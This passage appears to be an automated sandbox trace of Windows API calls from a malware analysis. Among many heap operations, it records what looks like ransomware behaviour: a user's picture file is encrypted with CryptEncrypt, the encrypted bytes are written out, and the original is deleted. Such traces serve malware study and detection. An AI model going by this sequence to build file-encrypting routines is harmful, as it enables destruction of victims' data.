(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0210.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0210.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.007] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaee8 [0210.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.007] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d26b0 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab2a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.018] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1265e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12660) returned 1 [0210.018] CharLowerBuffW (in: lpsz="byte[75360]", cchLength=0xb | out: lpsz="byte[75360]") returned 0xb [0210.019] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.020] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab308, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.020] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d26b0*, pdwDataLen=0x8cef60*=0x1265e, dwBufLen=0x12660 | out: pbData=0x37d26b0*, pdwDataLen=0x8cef60*=0x12660) returned 1 [0210.022] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.022] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.023] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.023] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.023] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.023] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.031] WriteFile (in: hFile=0x4dc, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x12660, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x12660, lpOverlapped=0x0) returned 1 [0210.033] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.033] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.033] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.033] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.033] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaaf60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.033] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0210.033] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.034] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.034] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.034] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.034] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.034] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.034] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.034] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.034] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.034] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.035] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.035] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.036] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.036] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.036] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.036] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7000, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.036] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0210.036] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.036] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.036] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.036] CloseHandle (hObject=0x520) returned 1 [0210.037] CloseHandle (hObject=0x4dc) returned 1 [0210.042] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.042] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.042] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/F3GpsjDs7t.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png", lpFilePart=0x8cedf4*="F3GpsjDs7t.png") returned 0x27 [0210.042] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f3gpsjds7t.png")) returned 0x20 [0210.042] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a4ab90, ftCreationTime.dwHighDateTime=0x1d5cfc9, ftLastAccessTime.dwLowDateTime=0xfec1ce90, ftLastAccessTime.dwHighDateTime=0x1d5d37b, ftLastWriteTime.dwLowDateTime=0xfec1ce90, ftLastWriteTime.dwHighDateTime=0x1d5d37b, nFileSizeHigh=0x0, nFileSizeLow=0x1265e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="F3GpsjDs7t.png", cAlternateFileName="F3GPSJ~1.PNG")) returned 0x9e2138 [0210.042] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\F3GpsjDs7t.png" (normalized: "c:\\users\\fd1hvy\\pictures\\f3gpsjds7t.png")) returned 1 [0210.047] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63a4ab90, ftCreationTime.dwHighDateTime=0x1d5cfc9, ftLastAccessTime.dwLowDateTime=0xfec1ce90, ftLastAccessTime.dwHighDateTime=0x1d5d37b, ftLastWriteTime.dwLowDateTime=0xfec1ce90, ftLastWriteTime.dwHighDateTime=0x1d5d37b, nFileSizeHigh=0x0, nFileSizeLow=0x1265e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="F3GpsjDs7t.png", cAlternateFileName="F3GPSJ~1.PNG")) returned 0 [0210.047] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0210.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0210.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.047] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0210.048] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6a8 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.048] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0210.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: 